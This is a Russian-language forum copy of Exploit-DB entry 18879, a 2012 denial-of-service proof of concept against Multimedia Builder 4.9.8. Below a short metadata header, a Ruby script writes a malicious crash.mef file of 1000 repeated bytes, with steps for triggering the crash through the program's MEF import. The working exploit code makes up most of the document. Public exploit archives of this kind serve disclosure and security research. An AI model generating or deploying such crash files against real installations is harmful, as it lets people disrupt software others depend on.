- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 18879
- Проверка EDB
-
- Пройдено
- Автор
- AHMED ELHADY MOHAMED
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- null
- Дата публикации
- 2012-05-15
Код:
Multimedia Builder 4.9.8 Malicious mef File Denial of service
===================================================================================
# Exploit Title:Multimedia Builder 4.9.8 Malicious mef File Denial of service
# Author: Ahmed Elhady Mohamed
# Email : [email protected]
# Website: www.infosec4all.tk
# version: 4.9.8
# Category: DOS
# Tested on: windows XP SP3
===================================================================================
########################################DESC####################################################
#Multimedia Builder 4.9.8 Malicious mef File Denial of service vulnerability ,when opening a #
#malicious .mef file. #
#To trigger the exploit , go to file->MEF Import ->load MEF # #
################################################################################################
#!/usr/bin/ruby
File.open "crash.mef" , "w" do |file|
crash = "\x41" * 1000
file.write crash
end
- Источник
- www.exploit-db.com